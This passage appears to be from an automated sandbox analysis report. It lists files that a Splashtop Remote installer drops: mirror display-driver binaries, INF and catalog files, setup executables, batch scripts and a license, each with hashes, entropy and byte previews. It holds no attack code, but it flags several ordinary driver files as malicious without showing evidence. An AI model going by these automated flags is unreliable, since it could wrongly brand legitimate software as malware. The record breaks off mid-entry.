                                                                                                                                                                                                                                                                                                                                  Preview:0. ...*.H........ .0. ....1.0...+......0.....+.....7.....v0..r0...+.....7.........8U<F..n1.L.\..081005153929Z0...+.....7.....0...0....R4.7.2.9.5.6.B.E.1.5.7.7.9.6.F.0.3.4.9.B.9.C.D.9.3.0.D.5.0.9.5.1.B.6.2.F.6.9.B.D...1..C02..+.....7...1$0"...F.i.l.e........m.v.2...d.l.l...0>..+.....7...100....O.S.A.t.t.r........2.:.5...1.,.2.:.5...2...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0i..+.....7...1[0Y04..+.....7...0&..... .....<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+........G)V..w..4...0..Q./i.0....R9.6.B.8.E.2.E.D.6.3.F.5.4.B.E.B.4.E.0.8.7.7.1.2.A.D.A.7.5.2.0.C.2.3.7.9.C.5.C.4...1..;02..+.....7...1$0"...F.i.l.e........m.v.2...i.n.f...0>..+.....7...100....O.S.A.t.t.r........2.:.5...1.,.2.:.5...2...0a..+.....7...1S0Q0,..+.....7........<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+............c.K.N.w...R.#y..0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RD.F.A.3.A.B.F.9.9.C.2.4.E.2.7.D.8.6.3.9.B.2

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\driver\mv2.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25536
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.314384276589044
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:jdxcojc4oPxNtS4v28b3pnd6DABnOSLwJiz:jdj9oPxjNv2YnPdpIiz
                                                                                                                                                                                                                                                                                                                                  MD5:52E972E497645851FA910787CC2050E0
                                                                                                                                                                                                                                                                                                                                  SHA1:1CE9A93996DFC5F24DF8CAD16E15555BE368B956
                                                                                                                                                                                                                                                                                                                                  SHA-256:B0C07A2912B4EC67CA8A37B890DB33A62CC0DB3A733CD6D146FF6F865D6E4B88
                                                                                                                                                                                                                                                                                                                                  SHA-512:4CADF2BFA9056A1756BB79C4EB2842E8A9A132544305EAB0F1433AF2C890B24DA3614E5E241A86358CF47FBF7F0A783102850346CAB2FA04B1AEDC9B81C79E94
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9.].W.].W.].W.].V.F.W...,.^.W...:.Z.W.....\.W.../.\.W.Rich].W.........PE..d......H...........!.....2..........0=..............................................g'.......................................................p..(............`..,....H..........<....@...............................................@...............................text....-.......................... ..h.rdata.......@.......2..............@..H.data........P.......8..............@....pdata..,....`.......<..............@..HINIT.........p.......>.............. ....rsrc................B..............@..B.reloc...............F..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\driver\mv2.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2255
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3700497661675906
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ehVVpvnf4+BCs00c/9XSvFhb54y83WhJhdYpBBh22wlFTP/7bp:MJfJ00Si4yMyA7DwlFLB
                                                                                                                                                                                                                                                                                                                                  MD5:1B4F828FC21AA28C3CE863A31C1F9D48
                                                                                                                                                                                                                                                                                                                                  SHA1:96B8E2ED63F54BEB4E087712ADA7520C2379C5C4
                                                                                                                                                                                                                                                                                                                                  SHA-256:E7F85212D7708402910830576B0BD84873C24A1339CFD3EBBE5A2939127438D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:9CF0E701ADCBBE05652F623A34849910C657FA9536513835D18FD184FAAD47B62C28437237A78494B8E31F5E27C0BDDCD9D4CB5C5B4BEDC56EF0842553AB3064
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:; mv2.inf..;..; Installation inf for the Mirror graphics adapter...;..;....[Version]..Signature="$CHICAGO$"..Provider=%Cyberfox%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=04/11/2007,6.0.1.0..CatalogFile="mv2.cat"....[DestinationDirs]..DefaultDestDir = 11..mv2.Miniport = 12 ; drivers..mv2.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%Cyberfox% = stdMfg,NTamd64....[stdMfg.NTamd64]..%Winmv2% = mv2, mv_hook_display_driver2....;..; General installation section..;....[mv2]..CopyFiles=mv2.Miniport, mv2.Display....;..; File sections..;....[mv2.Miniport]..mv2.sys....[mv2.Display]..mv2.dll......;..; Service Installation..;....[mv2.Services]..AddService = mv2, 0x00000002, mv2_Service_Inst, mv2_EventLog_Inst....[mv2_Service_Inst]....ServiceType = 1 ; SERVICE_KERNEL_DRIVER..StartType = 1 ; SERVICE_SYSTEM_START..ErrorControl = 0 ; SERVICE_ERROR_IGNORE..LoadOrderGroup =

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\driver\mv2.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.137468737457105
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:8CvhDWQJoIo6vyowJL/aoxhHoe068jSJUbueqEQ:hhDWQaD8YJLFHJ06dUb+EQ
                                                                                                                                                                                                                                                                                                                                  MD5:0469611E7DC0A882D123DC89FE386C01
                                                                                                                                                                                                                                                                                                                                  SHA1:7059D4EFBE980F3A355CF8401A33F7EA1E129CD9
                                                                                                                                                                                                                                                                                                                                  SHA-256:BFFA6606A5CCD1F79EF7D0F591BD6EE8FDE28C266EA8C8608D423321174CB87C
                                                                                                                                                                                                                                                                                                                                  SHA-512:FA1ED8E1A312497A1DCFB73F12D545BA298063250FCDC9E03B4EC71DD86C91743104EB322351F4AD1E33CDD3E412E92595EBA03EE860D013B0A2646BCB467327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.g'..g'..g'..g&..g'...\..g'...J..g'...Z..g'...J..g'...V..g'...[..g'..._..g'.Rich.g'.........................PE..d...0 .G.........."..................P.......................................p......u.......................................................dP..<....`.......@......................0 ............................................... ..(............................text...`........................... ..h.rdata....... ......................@..H.data........0......................@....pdata.......@......................@..HINIT.... ....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\install.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:6FMLVJ:uMLVJ
                                                                                                                                                                                                                                                                                                                                  MD5:903B157DCA56861C845179D4D1C5E930
                                                                                                                                                                                                                                                                                                                                  SHA1:E6B5ED1511F1F14F0436CA474FF457CB340E7C60
                                                                                                                                                                                                                                                                                                                                  SHA-256:8402E0C9189FA6EF6EF8E955606C5A20F880F1106EA5F81304E42A0864F078F8
                                                                                                                                                                                                                                                                                                                                  SHA-512:53F5BE22FD9B12FF9D084A65BE63BFA7A9B5489A5D95263343EE0DB3CE749B1B6D0999AC3CC34B23A4A970F3F02DD7ED1199269C12C8B59313FF58B225774006
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:setupdrv install

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\license.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (396), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.872615036376876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:0oSneisewrWYSaizLwupc5KEQbEE+H+s+joMyyeDbE7upgO8+jaUZN:2sQ1Rpc5DQo9+s+1yy7ipgl+NL
                                                                                                                                                                                                                                                                                                                                  MD5:624A16979822CA9E244602EF815E4FCF
                                                                                                                                                                                                                                                                                                                                  SHA1:FF39FD4A7EE12C5190144E2F28AB5D7DB2A3F435
                                                                                                                                                                                                                                                                                                                                  SHA-256:18D357C3792C89E9A8FC127E65A81BE919BEC7166E537ECA080478E0370E61C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:491EB3288F3753FB18DF1E1F634C07ECA7FF6970C6CE6778E0EB0C4FB1EC0A8E490C1273A0183CAC221DB8750B03FCDE5B7B03FBF8A98A5C43048523C7CE37C3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1. GRANT OF LICENSE:......RDV-Soft hereby grants Ultr@VNC Team -non-exclusive, royalty-free, worldwide, perpetual license to distribute, use the software product "Mirror driver" in binary form for their remote controle software. Ultr@VNC Team hereby grants the end-user the right to use and distribute the software product "Mirror Driver" with "Ultr@VNC"..... ....2. LIMITED WARRANTY......NO WARRANTY. To the maximum extent permitted by applicable law, We expressly disclaims any warranty for the SOFTWARE PRODUCT "Mirror Driver". The SOFTWARE PRODUCT "Mirror Driver" and any related documentation are provided "as is" without warranty of any kind, either express or implied, including, without limitation, the implied warranties of merchantability or fitness for a particular purpose...NO LIABILITY FOR CONSEQUENTIAL DAMAGES. To the maximum extent permitted by applicable law, in no event shall we be liable for any damages whatsoever (including, without limitation, damages for loss of business pro

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\setupdrv.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):90688
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.200844475591763
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:D/QY76jVjfCCHOLvctoA3eDDjEcUVzDOhtMRFS3CZiR3IeSkuH5ysQyMK:D/QNjfCEoAOD0cUVWhmRLARnSDH5y1y3
                                                                                                                                                                                                                                                                                                                                  MD5:137E02F6D5D1BEB5F8096AA34C93545C
                                                                                                                                                                                                                                                                                                                                  SHA1:8550A23A017B440A7D558F4DBC959C643262D803
                                                                                                                                                                                                                                                                                                                                  SHA-256:9CE571A987AEE98698D1A70D39A744A416136370D5659B23DE8C1CC523CEEB83
                                                                                                                                                                                                                                                                                                                                  SHA-512:38DD0F680C3D906307B0BDD835E035D154F0F65DCB69D25455D81F50F6E1ECC3854A507A26B2C1FE029B05EC1BC7ABB974DDB2190BC06B5808C4A14E243E808D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nx..Nx..Nx.....Nx......Nx.....Nx..Ny.ENx......Nx......Nx......Nx.Rich.Nx.................PE..d....T.G..........#..........n.......E.........@....................................._......................................................."..x....................L..@............................................................................................text............................... ..`.rdata...@.......B..................@..@.data...d=...@....... ..............@....pdata...............6..............@..@.rsrc................B..............@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\uninstall.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):411
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977180725182127
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kCdGk3hd0E23B1047V1j47V1u471kgAq3Gn3C:/1RqXRC4R94RQ4dAqqy
                                                                                                                                                                                                                                                                                                                                  MD5:2203EE251159885EF20D6970F67529C3
                                                                                                                                                                                                                                                                                                                                  SHA1:D775009C08D7EC7F684FC7B657DDC7BCB7DA94C6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C3D0070A0EA5BB0708565930199C77E7DC4BFC31A6B368B2F8A7B0239E739304
                                                                                                                                                                                                                                                                                                                                  SHA-512:3A1BBF3F460DCDCDE1DE3D5F345973D1827EB717AB7FCA3C3DE5A12E324125EF94D7FFC34F664D5C1763790E3A4189F065DFCA4E0E7FB43E4BEC0DA32255E785
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\devcon64.exe remove mv_hook_display_driver2 >> inst.log....\utils\devcon64.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End....\utils\DIFxCmd64.exe /u driver\mv2.inf >> inst.log..:End....sc stop mv2 >> inst.log..sc delete mv2 >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\driver\mv2.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8367
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.272037405136225
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:5otYRJoIo6vyowJL/aoxhHoe068jSJUbueqY:nRaD8YJLFHJ06dUb+Y
                                                                                                                                                                                                                                                                                                                                  MD5:89A312ED78E1EDAC37DE5FD1D3E4E0EB
                                                                                                                                                                                                                                                                                                                                  SHA1:0F913D609437D8B4C2D9675E66C650C6344B93D5
                                                                                                                                                                                                                                                                                                                                  SHA-256:065C1A3537BAE5BB645DAC15E068DE3CAEA40E460DF130A05D3CBFE15831E747
                                                                                                                                                                                                                                                                                                                                  SHA-512:A20DF9DEA384F8B52F287A2E16076CA32BF965B46A46B28BF49A1F18F342AA1E19A1B7FA7AD303AC3AB91364D5C18BCF62083360AF54DC5EA9236BD90AB35A1B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0. ...*.H........ .0. ....1.0...+......0..a..+.....7.....R0..N0...+.....7.....H.`.O.N@...B...b..081005153452Z0...+.....7.....0...0....R1.E.2.1.E.3.7.E.C.2.C.6.8.4.8.9.E.7.6.D.5.E.C.A.0.4.D.A.3.5.1.6.B.9.4.3.2.7.5.F...1..702..+.....7...1$0"...F.i.l.e........m.v.2...s.y.s...02..+.....7...1$0"...O.S.A.t.t.r........2.:.5...1...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0i..+.....7...1[0Y04..+.....7...0&..... .....<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+.........!.~....m^...5..C'_0....R4.5.3.D.8.9.E.E.3.3.4.F.4.7.2.4.3.C.6.C.C.C.5.3.4.A.D.4.D.4.6.9.B.E.3.0.9.7.2.6...1../02..+.....7...1$0"...F.i.l.e........m.v.2...i.n.f...02..+.....7...1$0"...O.S.A.t.t.r........2.:.5...1...0a..+.....7...1S0Q0,..+.....7........<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+........E=..3OG$<l.SJ..i.0.&0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R7.B.0.9.9.7.8.F.8.B.F.D.A.2.5.3.F.D.5.7.9.1.3.5.3.1.2.9.3.B.F.2.6.5

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\driver\mv2.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.695099027186018
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:w69hD4isesPZlFwQUWeFtdg4uS8fHt9ndIeBq6H7LFhaD8YJLFHJ06dUb+C1:w6WesRlFwQg1buSCH3nWB6bLPSLwJi2
                                                                                                                                                                                                                                                                                                                                  MD5:775286759FF1211C25A8D65D29024FD0
                                                                                                                                                                                                                                                                                                                                  SHA1:1E8A304D9DBCF3C0AA09AA10304B09B99995C54F
                                                                                                                                                                                                                                                                                                                                  SHA-256:9581581926651D7A2887FD51CE2D7A330333E47C4F91FB34D7B20C058D9B96D2
                                                                                                                                                                                                                                                                                                                                  SHA-512:54D4D0A0547311A6B19D5CB196E98DEF93EB5311F1328FA2B3674E81E157D266B2D8CF78E08E547F3BFE21CA716D4679674B23BCE196D612184840E578DAA806
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$.......................................................................................................................................................................................................................................................................................................................................................................................................9.b.}...}...}...}...g.......~.....S.z.....R.|.....V.|...Rich}...................PE..L......H...........!.....$...........%.......&...............................3......Jk.......................................,..(....................3.......2......p&...............................................&..l............................text...R!.......!.................. ..h.rdata..q....&.......&..............@..H.data...0....(.......(..............@...INIT....^....,.......,.............. ...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\driver\mv2.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2239
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.36119317959271
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ehVVpvn2vF+BCs0j/9XSvFhb54y83WhJhdYpBBN22wlFTP/7bp:MJQ20di4yMyAXDwlFLB
                                                                                                                                                                                                                                                                                                                                  MD5:D6AEB05521710E2006B4A9E8C07C68C4
                                                                                                                                                                                                                                                                                                                                  SHA1:453D89EE334F47243C6CCC534AD4D469BE309726
                                                                                                                                                                                                                                                                                                                                  SHA-256:F34C416888AEBE90A29948D95BEB8343B7B49CF7E1BB5193716FD97F0330E842
                                                                                                                                                                                                                                                                                                                                  SHA-512:13C61423D966A5A670BED20535BF6EA211FAAAC15CAD7D2E1124A855A27360CD7B97BFE01E5EE368A139DE9CA07B236427A2BEAEAD19F7C72FD610876696D82D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:; mv2.inf..;..; Installation inf for the Mirror graphics adapter...;..;....[Version]..Signature="$CHICAGO$"..Provider=%Cyberfox%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=05/25/2004,1.1..CatalogFile="mv2.cat"....[DestinationDirs]..DefaultDestDir = 11..mv2.Miniport = 12 ; drivers..mv2.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%Cyberfox% = stdMfg....[stdMfg]..%Winmv2% = mv2, mv_hook_display_driver2....;..; General installation section..;....[mv2]..CopyFiles=mv2.Miniport, mv2.Display....;..; File sections..;....[mv2.Miniport]..mv2.sys....[mv2.Display]..mv2.dll......;..; Service Installation..;....[mv2.Services]..AddService = mv2, 0x00000002, mv2_Service_Inst, mv2_EventLog_Inst....[mv2_Service_Inst]....ServiceType = 1 ; SERVICE_KERNEL_DRIVER..StartType = 1 ; SERVICE_SYSTEM_START..ErrorControl = 0 ; SERVICE_ERROR_IGNORE..LoadOrderGroup = Video..ServiceBinary

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\driver\mv2.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10304
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.601225217483284
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:M46n7JoIo6vyowJL/aoxhHoe068jSJUbueqBfg:TW7aD8YJLFHJ06dUb+W
                                                                                                                                                                                                                                                                                                                                  MD5:8CD0D603FF051F283CAEE66853622D65
                                                                                                                                                                                                                                                                                                                                  SHA1:2BAE5B78077F08564AA8DA2DBD8E91C4692BB211
                                                                                                                                                                                                                                                                                                                                  SHA-256:9CF391A95C44F449827004632A3995C66223D24A09CB309CBA2227C94079857E
                                                                                                                                                                                                                                                                                                                                  SHA-512:108DC92D80352C3FB2D3EA06B545AA1C19C492506CD0F9C71BF00FF38C97B7BAA840ABD9B33B1E3CE4A154860F1C9301C3504CD1738CC887870025226EA36C32
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$.......................................................................................................................................................................................................................................................................................................................................................................................................}>..9_..9_..9_..9_..:_...P.<_......;_.....8_.....8_..Rich9_..........................PE..L...X .G...................................................................................................................H...<...............................(....................................................................................text............................... ..h.rdata..............................@..H.data...............................@...INIT............................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\install.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:6FMLVJ:uMLVJ
                                                                                                                                                                                                                                                                                                                                  MD5:903B157DCA56861C845179D4D1C5E930
                                                                                                                                                                                                                                                                                                                                  SHA1:E6B5ED1511F1F14F0436CA474FF457CB340E7C60
                                                                                                                                                                                                                                                                                                                                  SHA-256:8402E0C9189FA6EF6EF8E955606C5A20F880F1106EA5F81304E42A0864F078F8
                                                                                                                                                                                                                                                                                                                                  SHA-512:53F5BE22FD9B12FF9D084A65BE63BFA7A9B5489A5D95263343EE0DB3CE749B1B6D0999AC3CC34B23A4A970F3F02DD7ED1199269C12C8B59313FF58B225774006
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:setupdrv install

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\license.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (396), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.872615036376876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:0oSneisewrWYSaizLwupc5KEQbEE+H+s+joMyyeDbE7upgO8+jaUZN:2sQ1Rpc5DQo9+s+1yy7ipgl+NL
                                                                                                                                                                                                                                                                                                                                  MD5:624A16979822CA9E244602EF815E4FCF
                                                                                                                                                                                                                                                                                                                                  SHA1:FF39FD4A7EE12C5190144E2F28AB5D7DB2A3F435
                                                                                                                                                                                                                                                                                                                                  SHA-256:18D357C3792C89E9A8FC127E65A81BE919BEC7166E537ECA080478E0370E61C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:491EB3288F3753FB18DF1E1F634C07ECA7FF6970C6CE6778E0EB0C4FB1EC0A8E490C1273A0183CAC221DB8750B03FCDE5B7B03FBF8A98A5C43048523C7CE37C3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1. GRANT OF LICENSE:......RDV-Soft hereby grants Ultr@VNC Team -non-exclusive, royalty-free, worldwide, perpetual license to distribute, use the software product "Mirror driver" in binary form for their remote controle software. Ultr@VNC Team hereby grants the end-user the right to use and distribute the software product "Mirror Driver" with "Ultr@VNC"..... ....2. LIMITED WARRANTY......NO WARRANTY. To the maximum extent permitted by applicable law, We expressly disclaims any warranty for the SOFTWARE PRODUCT "Mirror Driver". The SOFTWARE PRODUCT "Mirror Driver" and any related documentation are provided "as is" without warranty of any kind, either express or implied, including, without limitation, the implied warranties of merchantability or fitness for a particular purpose...NO LIABILITY FOR CONSEQUENTIAL DAMAGES. To the maximum extent permitted by applicable law, in no event shall we be liable for any damages whatsoever (including, without limitation, damages for loss of business pro

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\setupdrv.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.9219061141523825
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
